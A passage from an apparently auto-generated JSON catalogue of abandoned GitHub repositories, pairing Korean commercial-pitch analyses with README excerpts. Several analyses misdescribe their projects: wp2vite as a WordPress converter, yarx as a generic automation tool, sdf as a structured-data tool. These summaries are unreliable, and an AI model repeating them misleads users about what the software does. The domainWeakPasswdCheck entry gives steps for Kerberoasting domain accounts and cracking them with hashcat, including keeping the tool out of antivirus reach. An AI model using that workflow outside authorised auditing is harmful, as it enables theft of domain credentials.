Mirror](https://zora.mirror.xyz/UwQwplCMEe1T5eUkp0CpTDJjZXvAK3eeakskTaQe3pE)\n\n## Features\n1. uses [`@zoralabs/nft-components`](https://github.com/ourzora/nft-components) to render NFTs and auction info.\n2. includes [`@zoralabs/nft-hooks`](https://github.com/ourzora/nft-hooks) for more custom applications.\n3. uses [`@zoralabs/manage-auction-hooks`](https://github.com/ourzora/manage-auction-hooks) for auction interactions.\n4. uses [`@zoralabs/simple-wallet-prov","composite_score":0.5023,"license_safety_tag":"safe"},{"name":"alibaba/oceanbase","github_url":"https://github.com/alibaba/oceanbase","stars":22,"language":"","license":"gpl-2.0","abandonment_months":61,"description":"# OceanBase 프로젝트 분석\n\n## 왜 보물인가\n알리바바가 만든 초고속 데이터베이스로, 수십억 개의 거래 기록을 동시에 처리할 수 있어 금융·전자상거래 기업들의 핵심 인프라가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **은행/금융사 SaaS**: 수백만 고객의 실시간 거래 기록을 안정적으로 관리하는 클라우드 서비스\n2. **전자상거래 내부 ","readme_excerpt":"# OceanBase\n\nOceanBase是由蚂蚁金服、阿里巴巴完全自主研发的金融级分布式关系数据库，始创于2010年。OceanBase具有数据强一致、高可用、高性能、在线扩展、高度兼容SQL标准和主流关系数据库、低成本等特点。OceanBase至今已成功应用于支付宝全部核心业务：交易、支付、会员、账务等系统以及阿里巴巴淘宝（天猫）收藏夹、P4P广告报表等业务。除在蚂蚁金服和阿里巴巴业务系统中获广泛应用外，从2017年开始，OceanBase开始服务外部客户，客户包括南京银行、西安银行、印度Paytm、人保健康险等。\n\n\n如您对OceanBase感兴趣，欢迎访问：https://open.oceanbase.com/, \n开源地址:\nhttps://gitee.com/oceanbase/oceanbase\nhttps://github.com/oceanbase/oceanbase\n\n欢迎提任何建议或反馈. \n","composite_score":0.5023,"license_safety_tag":"restricted"},{"name":"microsoft/qsharp-language","github_url":"https://github.com/microsoft/qsharp-language","stars":5,"language":"ANTLR","license":"MIT","abandonment_months":29,"description":"# Microsoft Q# 언어 저장소 분석\n\n## 왜 보물인가\n양자 컴퓨터를 쉽게 프로그래밍할 수 있도록 마이크로소프트가 만든 공개 기술로, 미래 초고성능 컴퓨팅 시대를 준비하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 양자 알고리즘 개발 플랫폼 (기업들이 구독해서 사용)\n- **내부 업무 도구**: 제약사·","readme_excerpt":"## DEPRECATION NOTICE\n\n**This repository is deprecated.** \n\nFor the Modern QDK repository, please visit [Microsoft/qsharp](http://github.com/microsoft/qsharp).\n\nYou can also try out the Modern QDK in VS Code for Web at [vscode.dev/quantum](https://vscode.dev/quantum).\n\nFor more information about the Modern QDK and Azure Quantum, visit [https://aka.ms/AQ/Documentation](https://aka.ms/AQ/Documentation).\n\n## Contributing\n\nSuggestions for features and adaptions are filed and tracked in the form of [issues](https://github.com/microsoft/qsharp-language/issues) on this repository.\nWe greatly appreciate your feedback and contribution to the discussion in the form of comments and votes on open issues. Better understanding the needs of the community will help us make better decisions.\n\nIf you have a suggestion for a feature and would like to share your thoughts, we encourage you to file an issue following our [suggestion template](https://github.com/microsoft/qsharp-language/issues/new?template=","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"zema1/yarx","github_url":"https://github.com/zema1/yarx","stars":13,"language":"Go","license":"MIT","abandonment_months":39,"description":"# yarx 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 반복적인 작업을 자동화할 수 있게 해주는 도구로, 업무 효율을 대폭 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트에서 자동화 기능을 제공하는 플랫폼으로 운영\n- **내부 업무 도구**: 기업의 개발팀이 일상적인 반복 작업을 줄이는 솔루션으로 활용\n- **API ","readme_excerpt":"<div align=\"center\">\n<img src=\"assets/images/logo.png\" alt=\"Logo\" height=\"140\">\n</div>\n\n<p align=\"center\">\n    <a href=\"https://yarx.koalr.me/\"><b>在线体验</b></a>&nbsp;&nbsp;&nbsp;\n    <a href=\"https://yarx.koalr.me/report.html\"><b>漏洞报告</b></a> \n</p>\n\n## Yarx 是什么\n\nYarx 来自于 `x-r-a-y` 的反向拼写，它能够根据 xray 的 yaml poc 规则全自动的生成一个满足规则要求的 Server，使用 xray 扫描该 Server 将会扫描出对应的漏洞。它的核心工作原理如下：\n\n\n\n![yarx-core](assets/images/core.svg)\n\n\n\n它的主要特性有:\n\n+ 支持 status、header、body 等位置的响应变换\n+ 支持 `==` `contains` `submatch` 等各种匹配模式\n+ 支持动态变量的渲染和捕获以及多级规则的变量追踪\n+ 支持绝大部分内置函数的解析和调用\n+ 通过路由合并和智能排序等策略有效减少路由冲突\n+ 平铺式规则处理逻辑，支持并发扫描\n+ 支持捕获扫描事件做进一步分析联动\n\n核心原理: [https://koalr.me/posts/core-concept-of-yarx/](https://koalr.me/posts/core-concept-of-yarx/)\n\n## 立即尝试\n\n```bash\n./xray webscan --plugins phantasm --html-output yarx.html --url https://yarx.koalr.me\n```\n\n![running](./assets/images/scan.gif)\n\n几秒钟后你就会得到一个类似的漏洞报告:  [report.html](https://yarx.koalr.me/report.html)\n\n\n## 安装\n+ Github Release\n\n  [https://github.com/zema1/yarx/releases](http","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"rhasspy/larynx","github_url":"https://github.com/rhasspy/larynx","stars":5,"language":"Python","license":"MIT","abandonment_months":36,"description":"# Larynx 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 자연스러운 목소리로 텍스트를 읽어주는 기술(음성 합성)을 누구나 쉽게 만들고 배포할 수 있게 해주는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **음성 안내 서비스 SaaS**: 고객 센터 자동응답, 음성 공지사항 발송 서비스로 매월 구독료 수금\n2. **장애인 지원 앱**: 시각장애인용","readme_excerpt":"# Larynx has been succeeded by [Piper](https://github.com/rhasspy/piper)!\n\nThis repository is no longer actively developed.\n\n---\n\n# Larynx\n\n🎥 [DEMO VIDEO](https://www.youtube.com/watch?v=hBmhDf8cl0k)\n\nOffline end-to-end text to speech system using [gruut](https://github.com/rhasspy/gruut) and [onnx](https://onnx.ai/) ([architecture](#architecture)). There are [50 voices available across 9 languages](#samples).\n\n```sh\ncurl https://raw.githubusercontent.com/rhasspy/larynx/master/docker/larynx-server \\\n    > ~/bin/larynx-server && chmod +755 ~/bin/larynx-server\nlarynx-server\n```\n\nVisit http://localhost:5002 for the test page. See http://localhost:5002/openapi/ for HTTP endpoint documentation.\n\n![Larynx screenshot](img/web_screenshot.png)\n\nSupports a [subset of SSML](#ssml) that can use multiple voices and languages!\n\n``` xml\n<speak>\n  The 1st thing to remember is that 9 languages are supported in Larynx TTS as of 10/19/2021 at 10:39am.\n\n  <voice name=\"harvard\">\n    <s>\n      The current v","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"hi-dhl/Binding","github_url":"https://github.com/hi-dhl/Binding","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":38,"description":"# hi-dhl/Binding 저장소 분석\n\n## 왜 보물인가\n앱 개발할 때 복잡한 코드 작성을 줄여주는 도구로, 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발사 SaaS**: 개발팀이 이 도구를 구독하여 앱 만드는 시간을 단축하고 비용을 절감\n2. **스타트업 내부 도구**: 소규모 개발팀이 빠르게 앱을 출시해야 할 때","readme_excerpt":"# <p align=\"center\"> Binding </p>\n\n<p align=\"center\">\nSimple API implement DataBinding and ViewBinding. Welcome star<br/>\n简单的 API 实现 DataBinding 和 ViewBinding，欢迎 star\n</p>\n\n<p align=\"center\">\n    <a href=\"https://github.com/hi-dhl/Binding\">English</a> &nbsp;\n    ·\n    &nbsp;<a href=\"https://github.com/hi-dhl/Binding/blob/main/doc/README_CN.md\">中文</a>\n</p>\n  \n<p align=\"center\">\n<a href=\"https://github.com/hi-dhl\"><img src=\"https://img.shields.io/badge/GitHub-HiDhl-4BC51D.svg?style=flat\"></a>  <img src=\"https://img.shields.io/badge/language-kotlin-orange.svg\"/> <a href=\"https://search.maven.org/search?q=g:%22com.hi-dhl%22%20AND%20a:%22binding%22\"><img src=\"https://img.shields.io/maven-central/v/com.hi-dhl/binding.svg?label=Maven%20Central\"/></a> <img src=\"https://img.shields.io/badge/platform-android-lightgrey.svg\"/>\n</p>\n\n<p align=\"center\"> If the image cannot be viewed, please click here to view it <a href=\"http://img.hi-dhl.com/vbdb.png\"> img1 </a> | <a href=\"http://img.hi-dhl.com/Vie","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"gorhom/react-native-paper-onboarding","github_url":"https://github.com/gorhom/react-native-paper-onboarding","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":55,"description":"# gorhom/react-native-paper-onboarding 분석\n\n## 왜 보물인가\n모바일 앱의 첫 사용자를 위한 안내 화면을 쉽게 만들 수 있는 도구로, 앱 설치 후 사용자가 기능을 이해하도록 돕습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 새로운 기능 출시 시 사용자에게 그 기능을 설명하는 튜토리얼 화면으로 활용\n2. *","readme_excerpt":"<div align=\"center\">\n<h1>Paper Onboarding</h1>\n\n[![npm](https://badgen.net/npm/v/@gorhom/paper-onboarding)](https://www.npmjs.com/package/@gorhom/paper-onboarding) [![npm](https://badgen.net/npm/license/@gorhom/paper-onboarding)](https://www.npmjs.com/package/@gorhom/paper-onboarding) [![npm](https://badgen.net/npm/types/@gorhom/paper-onboarding)](https://www.npmjs.com/package/@gorhom/paper-onboarding)\n\n<img src=\"./preview.gif\">\n\nPaper Onboarding is a material design UI slider for `React Native` inspired by [Ramotion Paper Onboarding](https://github.com/Ramotion/paper-onboarding).\n\n</div>\n\n---\n\n## Installation\n\n```sh\nyarn add @gorhom/paper-onboarding\n# or\nnpm install @gorhom/paper-onboarding\n```\n\n> Also, you need to install [react-native-reanimated](https://github.com/software-mansion/react-native-reanimated), [react-native-gesture-handler](https://github.com/software-mansion/react-native-gesture-handler) & [react-native-svg](https://github.com/react-native-community/react-native-svg),","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"tnfe/wp2vite","github_url":"https://github.com/tnfe/wp2vite","stars":12,"language":"JavaScript","license":"MIT","abandonment_months":54,"description":"# wp2vite 저장소 분석\n\n## 왜 보물인가\n워드프레스로 만든 오래된 웹사이트를 최신 기술로 빠르게 변환해주는 도구라, 웹사이트 성능 개선이 필요한 기업들의 실질적인 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 웹사이트 마이그레이션 자동화 플랫폼\n- 중소 에이전시와 개발자들이 구독 형태로 사용하며, 변환 건수에 따라 ","readme_excerpt":"English | [简体中文](./README.zh-CN.md)\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/wp2vite\" target=\"_blank\" rel=\"noopener noreferrer\">\n    <img width=\"180\" src=\"https://github.com/tnfe/wp2vite/blob/master/logo.png?raw=true\" alt=\"wp2vite logo\">\n  </a>\n</p>\n<br/>\n<p align=\"center\">\n  <a href=\"https://npmjs.com/package/vite\"><img src=\"https://img.shields.io/badge/vite-v2.1.0-brightgreen\" alt=\"npm vite\"></a>\n  <a href=\"https://www.npmjs.com/package/webpack\"><img src=\"https://img.shields.io/badge/npm-v2.1.4-brightgreen\" alt=\"npm webpack\"></a>\n  <a href=\"https://www.npmjs.com/package/wp2vite\"><img src=\"https://img.shields.io/badge/webpack->=4-brightgreen\" alt=\"npm package\"></a>\n  <a href=\"https://nodejs.org/en/about/releases/\"><img src=\"https://img.shields.io/badge/node->=10-brightgreen\" alt=\"node compatility\"></a>\n</p>\n<br/>\n\n# wp2vite\nIt has been officially included，[detail](https://github.com/vitejs/awesome-vite#vue-cli)\n\n## Overview\n\nA front-end project automatic conversion","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"arciisine/MaterialThemeGenerator","github_url":"https://github.com/arciisine/MaterialThemeGenerator","stars":17,"language":"SCSS","license":"MIT","abandonment_months":39,"description":"# MaterialThemeGenerator 분석\n\n## 왜 보물인가\n앱이나 웹사이트의 색감을 자동으로 만들어주는 도구로, 디자인 초보자도 프로처럼 예쁜 색 조합을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 앱 개발 플랫폼에서 자동 색상 생성 기능을 판매\n2. **내부 업무 도구**: 대규모 IT 회사의 디자인팀이 ","readme_excerpt":"# MaterialThemeGenerator\n\nView Demo at https://materialtheme.arcsine.dev\n\nThis project was generated with [Angular CLI](https://github.com/angular/angular-cli) version 7.0.5.\n\n## Development server\n\nRun `ng serve` for a dev server. Navigate to `http://localhost:4200/`. The app will automatically reload if you change any of the source files.\n\n## Code scaffolding\n\nRun `ng generate component component-name` to generate a new component. You can also use `ng generate directive|pipe|service|class|guard|interface|enum|module`.\n\n## Build\n\nRun `ng build` to build the project. The build artifacts will be stored in the `dist/` directory. Use the `--prod` flag for a production build.\n\n## Running unit tests\n\nRun `ng test` to execute the unit tests via [Karma](https://karma-runner.github.io).\n\n## Running end-to-end tests\n\nRun `ng e2e` to execute the end-to-end tests via [Protractor](http://www.protractortest.org/).\n\n## Further help\n\nTo get more help on the Angular CLI use `ng help` or go check out t","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"AlessandroFC15/Fuck-Youtube","github_url":"https://github.com/AlessandroFC15/Fuck-Youtube","stars":36,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"# AlessandroFC15/Fuck-Youtube 분석\n\n## 왜 보물인가\nYouTube의 광고와 추천 알고리즘을 우회하거나 제어할 수 있는 도구로, 동영상 플랫폼 사용자들의 불편함을 직접 해결해주는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 브라우저 확장 프로그램으로 제공하여 월별 구독료를 받는 광고 차단 및 콘텐츠","readme_excerpt":"# Fuck-Youtube \n\n[![Build Status](https://travis-ci.org/AlessandroFC15/Fuck-Youtube.svg?branch=master)](https://travis-ci.org/AlessandroFC15/Fuck-Youtube) \n\n<p><img width=\"20\" src=\"https://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/firefox/files/2017/12/firefox-logo-300x310.png\"> <a href=\"https://addons.mozilla.org/en-US/firefox/addon/f-ck-youtube/\">Available for Firefox</a></p>\n\nA browser extension that allows the user to watch YouTube videos that are blocked for a certain region.\n\n<p align=\"center\">\n  <img width=\"600\" src=\"https://raw.githubusercontent.com/AlessandroFC15/Fuck-Youtube/master/assets/pictures/tiles/920x680/920x680.png\">\n</p>\n\n## Project Info\n\nThis project uses [Semantic Versioning](https://semver.org/).\n\n- **Current Version**: 1.0.0 (Latest version only available on Firefox)\n\n- **Code Style**: [Crockford](http://javascript.crockford.com/code.html), checked by [JSCS](http://jscs.info/)\n\n- **Code Quality Tool**: [JSHint](http://jshint.com/about/)\n\n<p align=\"center\">","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"codingforentrepreneurs/FastAPI-Microservice-for-Django","github_url":"https://github.com/codingforentrepreneurs/FastAPI-Microservice-for-Django","stars":6,"language":"Python","license":"unknown","abandonment_months":57,"description":"# FastAPI-Microservice-for-Django 분석\n\n## 왜 보물인가\nDjango라는 인기 있는 웹 개발 도구와 FastAPI라는 최신 고속 도구를 연결해주는 가교 역할로, 기존 시스템을 현대화하려는 기업들에게 실질적인 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기존 Django 기반 제품을 빠르게 확장할 ","readme_excerpt":"[![FastAPI Microservice for Django](https://static.codingforentrepreneurs.com/media/projects/fastapi-microservice-django/images/share/FastAPI_Microservice_for_Try_Django.jpg)](https://www.codingforentrepreneurs.com/projects/fastapi-microservice-django)\n\n\nLearn to deploy a FastAPI application into production DigitalOcean App Platform. This is a microservice for our [Try Django 3.2](https://www.codingforentrepreneurs.com/projects/try-django-3-2) project. The goal is to extract any and all text from images using a technique called OCR.\n\nHere's a list of the packages we will use to accomplish this:\n\n- FastAPI\n- Tesseract OCR\n- pytesseract\n- pre-commit\n- pytest\n- Gunicorn\n- Uvicorn\n- Requests\n- Docker\n- and more\n\n## Want to just run the app?\nClick below to deploy to DigitalOcean. Be sure to grab your $100 credit [here](https://do.co/cfe-github).\n\n\n[![Deploy to DO](https://www.deploytodo.com/do-btn-blue.svg)](https://cloud.digitalocean.com/apps/new?repo=https://github.com/codingforentreprene","composite_score":0.5022,"license_safety_tag":"unknown"},{"name":"chroblert/domainWeakPasswdCheck","github_url":"https://github.com/chroblert/domainWeakPasswdCheck","stars":16,"language":"C","license":"unknown","abandonment_months":78,"description":"# domainWeakPasswdCheck 분석 보고서\n\n## 왜 보물인가\n회사나 조직의 약한 비밀번호를 자동으로 찾아내 해킹 피해를 미리 막을 수 있는 보안 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업의 직원 계정 보안을 점검해주는 월 구독형 서비스\n- **내부 업무 도구**: 대기업 IT팀이 정기적으로 직원 비밀번호 강","readme_excerpt":"# domainWeakPasswdCheck\n\n# domainAccountCheck-v2.0说明\n\n## 改版说明\n\n1. v1.0运行速度慢\n2. v1.0使用稍大一些的字典进行爆破时，很大概率上会卡掉\n3. v2.0借助借助hashcat工具进行爆破，速度上有特别大的提升\n4. v2.0默认只适用于64位系统，若在32位上使用，需修改domainAccountCheck-v2.ps1脚本\n\n## 文件说明\n\n> - domainAccountCheck-v2.0 为主目录,进入到该目录下运行程序\n>   - `domainAccountCheck-v2.ps1`:是运行的主程序\n> - Dicts 目录下是字典文件，将需要尝试的密码放进JCPasswd.txt文件中\n> - kerberoast目录下是导出ST的凭据所用到的ps脚本\n> - hashcat目录下是爆破用到的工具\n> - result目录下是包含运行产生的一些结果\n>   - `allUserAndSPNList.txt`:用户名与对应的SPN\n>   - `allUserList.txt`:所有的域用户账户\n>   - `sucSPNList.txt`:成功注册的SPN名称\n>   - `sucUserList.txt`:成功注册SPN的用户\n>   - `failUserList.txt`:注册SPN失败的用户\n>   - `userAndPasswdList.txt`:检查出的域内密码安全性较弱的用户以及相应的口令\n\n## 使用说明\n\n1. > - 将domainWeakPasswdCheck放到一个杀软杀不到的地方，不然，hashcat会被删除，无法进行爆破\n   > - 运行程序的计算机要位于域中\n   > - 运行程序的账户需要加入域\n\n2. 填充密码字典到Dicts\\JCPasswd.txt文件，每行一个密码，ANSI格式保存\n\n3. 以管理员权限运行powershell，设置执行策略\n\n   `Set-ExecutionPolicy RemoteSigned`\n\n4. 进入到domainWeakPasswdCheck目录下的domainAccountCheck-v2.0目录\n\n5. 运行程序\n\n   `.\\domainAccountCheck-v2.ps1`\n   \n6. ","composite_score":0.5022,"license_safety_tag":"unknown"},{"name":"pudae/kaggle-understanding-clouds","github_url":"https://github.com/pudae/kaggle-understanding-clouds","stars":6,"language":"Python","license":"BSD-2-Clause","abandonment_months":43,"description":"# pudae/kaggle-understanding-clouds 분석\n\n## 왜 보물인가\n위성 사진에서 구름의 종류를 자동으로 인식하는 AI 기술로, 날씨 예보나 기후 변화 분석에 필수적인 핵심 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기상청·항공사 SaaS 서비스**\n- 실시간 위성 영상을 분석해 구름 정보를 제공하는 구독형 웹 서비스로 판매\n","readme_excerpt":"# kaggle-understanding-clouds\nCode for 1st place solution in Kaggle Understanding Clouds from Satellite Images Challenge.\n\nTo read the brief description of the solution, please, refer to [the Kaggle post](https://www.kaggle.com/c/understanding_cloud_organization/discussion/118080#latest-678045)\n\n## Reproducing Submission\nTo reproduce my submission without retraining, do the following steps:\n1. [Installation](#installation)\n2. [Download Dataset](#download-dataset)\n3. [Download Pretrained models](#pretrained-models)\n4. run `bash reproduce.sh`\n\n## Installation\nAll requirements should be detailed in requirements.txt. Using Anaconda is strongly recommended.\n```\nconda create -n cloud python=3.6\nconda activate cloud\npip install -r requirements.txt\n```\n\n## Prepare dataset\n### Download dataset\nDownload and extract *train_images.zip* and *test_images.zip* to *data* directory.\n```\n$ kaggle competitions download -c understanding_cloud_organization\n$ unzip understanding_cloud_organization.zip -d da","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"DawnFz/GenShin-LauncherDIY","github_url":"https://github.com/DawnFz/GenShin-LauncherDIY","stars":10,"language":"C#","license":"MIT","abandonment_months":32,"description":"# GenShin-LauncherDIY 분석\n\n## 왜 보물인가\n게임 실행 프로그램을 직접 만들고 커스터마이징할 수 있는 오픈소스 도구로, 게임사나 개발자들이 자신의 게임 배포 방식을 완전히 통제할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **게임사 내부 도구**: 인디 게임 개발사가 자체 게임 런처를 만들어 비용 절감 및 사용자 데이터 관리\n2","readme_excerpt":"# 快速开始\n\n|README - 语言|\n|-|\n|[简体中文](./README.md)|\n|[繁体中文](Docs/README_CNT.md)|\n|日本語 - 制作中|\n|[English](Docs/README_EN.md)|\n\n## 系统环境要求\n\n|要求|规格|\n|-|-|\n|系统版本|Windows 7 SP1 及以上（64位操作系统）|\n|运行时|[.NET **Desktop** Runtime 6.0.4](https://dotnet.microsoft.com/en-us/download/dotnet/thank-you/runtime-desktop-6.0.4-windows-x64-installer)|\n\n## 下载 原启Plus\n\n- 你可以在 Genshin Launcher Plus 的 GitHub 仓库的 [发布页面](https://github.com/DawnFz/GenShin-LauncherDIY/releases) 下载最新版原启Plus\n  - 无法访问Github的用户亦可以通过 [阿里云盘](https://www.aliyundrive.com/s/5fAP4oRCZBs) 分流下载\n  - 你也可以从[原启Plus交流群](https://jq.qq.com/?_wv=1027&k=hHtDKShK)下载到所有和 **原神启动器Plus** 的相关文件\n\n## 项目简介\n\n-  [项目主页](https://www.dawnfz.com)\n-  [更新历史](https://www.dawnfz.com/document/view/updated)\n\n## 赞助我们\n\n- 如果你觉得本项目还不错的话请给本项目点个Star吧！~\n- 你也可以到[赞助页面](https://www.dawnfz.com/document/view/sponsor.html)支持一下，给予开发者一点的动力\n\n## 截图预览\n\n![原启Plus主页](https://s2.loli.net/2022/03/08/UcaQSyRz6LJTen9.jpg)\n\n","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"StarCrossPortal/bug-hunting-101","github_url":"https://github.com/StarCrossPortal/bug-hunting-101","stars":9,"language":"C++","license":"unknown","abandonment_months":53,"description":"# Bug Hunting 101 저장소 분석\n\n## 왜 보물인가\n소프트웨어의 결함을 찾아내는 방법을 배우고 가르칠 수 있는 교육 자료로, 보안 취약점 발견 능력을 갖춘 인력 양성의 출발점이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 버그 발견 플랫폼으로 운영하여 기업들이 자신의 소프트웨어 결함을 찾게 하고 수수료 징수\n","readme_excerpt":"# bug-hunting-101\n\n## What is this?\n\nThis repository is to help new-comers (like ourselves) of binary bug hunting area to improve their skills.\n\nCurrently, the gap between CTF and real world bug hunting can be quite huge.\nAnd this repository is our attempt to solve that problem by porting the real world bug hunting to small exercises.\n\nCVEs are selected out and setup in a certain scene, your goal is to repeat the process of finding such vulnerabilities out.\n\n## Intro\n\nWe have prepared 3 levels.\nEach level provides excersises with different difficulties:\n\n- Level 1: Details of the CVEs are provided to help you from \"re-discovering\" the original vulnerability. Reports like [this](https://talosintelligence.com/vulnerability_reports/TALOS-2020-1127) are provided.\nSo this should be the easiest level.\n- Level 2: the details will be emitted. But to narrow down, information about which part of the project contains such vulnerability will be provided. For example, if the bug is about ANGEL (mod","composite_score":0.5022,"license_safety_tag":"unknown"},{"name":"strontic/xcyclopedia","github_url":"https://github.com/strontic/xcyclopedia","stars":10,"language":"PowerShell","license":"MIT","abandonment_months":55,"description":"# xcyclopedia 프로젝트 분석\n\n## 왜 보물인가\nWindows 보안 위협 정보를 한곳에 모아 누구나 쉽게 검색할 수 있는 백과사전으로, 기업의 보안 담당자들이 위험을 빠르게 파악하는 데 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 모니터링 SaaS**: 의심스러운 프로세스가 감지되면 xcyclopedia 데이터를 자동으로 조회","readme_excerpt":"![xCyclopedia Logo](/assets/strontic-xcyclopedia-logo.png \"xCyclopedia\")\n\n# xCyclopedia\nEncyclopedia for Executables\n\n## What is xCyclopedia?\nThe xCyclopedia project attempts to document all executable binaries (and eventually scripts) that reside on a typical operating system. Currently, this includes all observed EXE and DLL files, as well as COM Objects *(new!)*. It provides a [web page](https://strontic.github.io/xcyclopedia) to view the data as well as a [machine-readable format](/output) (JSON and CSV) that can be immediately usable in other systems such as SIEMs to enrich observed executions with contextual data.\n\n## What data points are available?\n\n* Runtime data (Standard Out, Standard Error, Children Processes, Screenshots, Open Handles, Loaded Modules, Window Title)\n* File metadata (File Description, Original File Name, Product Name, Comments, Company Name, File Version, Product Version, Copyright, PE Machine Type)\n* Digital signature validity and associated metadata (Serial","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"shapun963/Apk-AAB-Converter","github_url":"https://github.com/shapun963/Apk-AAB-Converter","stars":9,"language":"Kotlin","license":"GPL-3.0","abandonment_months":31,"description":"# Apk-AAB-Converter 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 반복적으로 하는 번거로운 파일 변환 작업을 자동화해주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 앱 개발사들을 위한 클라우드 기반 자동 변환 서비스 (월 구독료 징수)\n2. **내부 업무 도구**: 모바일 앱 배포 대행사들이 클라이언트","readme_excerpt":"# Apk-AAB-Converter\nA tool that converts AAB file to Apk file and Apk file to AAB file. Only works on android 8 and 8+ devices as it uses java.nio.* and other classes added in android 8. Check github actions for latest app.","composite_score":0.5022,"license_safety_tag":"restricted"},{"name":"sxyu/sdf","github_url":"https://github.com/sxyu/sdf","stars":5,"language":"C++","license":"BSD-2-Clause","abandonment_months":32,"description":"# sxyu/sdf 프로젝트 분석\n\n## 왜 보물인가\n구조화된 데이터 형식(SDF)을 다루는 도구로, 복잡한 데이터를 체계적으로 관리하고 처리해야 하는 기업들의 운영 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 정제 및 검증 플랫폼으로 고객사의 대량 데이터를 자동으로 정렬하고 오류를 찾아주는 웹 서비스\n","readme_excerpt":"# Triangle mesh to signed-distance function (SDF)\n\nGiven a triangle mesh and a set of points, this library supports:\n1. Computing SDF of mesh at each point: `sdf(points)`\n2. Computing whether each point is inside mesh: `sdf.contains(points)`\n3. Computing nearest neighbor vertex index for each point: `sdf.nn(points)`\nAll operations are CPU-only and parallelized.\n\n## Quickstart\n\n**Install python binding**: `pip install pysdf`\n\n### Usage example:\n```python\nfrom pysdf import SDF\n\n# Load some mesh (don't necessarily need trimesh)\nimport trimesh\no = trimesh.load('some.obj')\nf = SDF(o.vertices, o.faces); # (num_vertices, 3) and (num_faces, 3)\n\n# Compute some SDF values (negative outside);\n# takes a (num_points, 3) array, converts automatically\norigin_sdf = f([0, 0, 0])\nsdf_multi_point = f([[0, 0, 0],[1,1,1],[0.1,0.2,0.2]])\n\n# Contains check\norigin_contained = f.contains([0, 0, 0])\n\n# Misc: nearest neighbor\norigin_nn = f.nn([0, 0, 0])\n\n# Misc: uniform surface point sampling\nrandom_surface_poin","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"mixandjam/Superhot-BulletTime","github_url":"https://github.com/mixandjam/Superhot-BulletTime","stars":5,"language":"C#","license":"MIT","abandonment_months":79,"description":"# Superhot-BulletTime 분석 리포트\n\n## 왜 보물인가\n게임에서 영화같은 '슬로우 모션 총격 장면'을 만드는 기술로, 액션 게임 개발자들이 원하던 핵심 기능을 즉시 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 SaaS 플랫폼**\n- 게임 제작 도구에 '불릿타임 효과' 기능을 내장 서비스로 제공하고 월정액 구독료 수익","readme_excerpt":"\n<p align=\"center\">\n    <img width=\"400px\" src=\"http://mixandjam.com/wp-content/uploads/2019/11/git.png\">    \n</p>\n\n# Superhot's Bullet Time | Mix and Jam [![Discord Chat](https://img.shields.io/discord/308323056592486420.svg)](https://discord.gg/PwCzrBX) <a href=\"https://patreon.com/mixandjam\"><img src=\"https://img.shields.io/endpoint.svg?url=https%3A%2F%2Fshieldsio-patreon.herokuapp.com%2Fmixandjam\" /></a>\n\nThis is the official respository for the episode #18 of the [Mix and Jam Youtube Channel](https://www.youtube.com/c/MixAndJam)!\n\n## Getting Started\n\nThese instructions will get you a copy of the project up and running on your local machine for development and testing purposes.\n\n### Prerequisites\n\n-  Unity ver. 2019.2 or higher\n\n### Running the project\n\nAfter cloning or downloading the repository, open the root project folder in unity and press the Play button.\n\nYou can see a running demo of the project in [this video](https://youtu.be/T6VfWfqbgVs).\n\n## Built With\n\n* [DOTween](http","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"EdurtIO/incubator-dbm","github_url":"https://github.com/EdurtIO/incubator-dbm","stars":5,"language":"TypeScript","license":"Apache-2.0","abandonment_months":28,"description":"# EdurtIO/incubator-dbm 상용화 분석\n\n## 왜 보물인가\n데이터베이스를 직관적으로 관리할 수 있는 통합 도구로, 기술 지식이 부족한 중소 기업도 복잡한 데이터 작업을 간편하게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 중소기업 대상 데이터 관리 플랫폼**\n- 엑셀 대신 클라우드 기반으로 안전하게 고객 정보","readme_excerpt":"<br />\n<p align=\"center\">\n    <a href=\"https://github.com/EdurtIO/incubator-dbm\">\n      <img src=\"src/shared/assets/icons/favicon.png\" alt=\"Logo\" width=\"120px\" height=\"120px\">\n    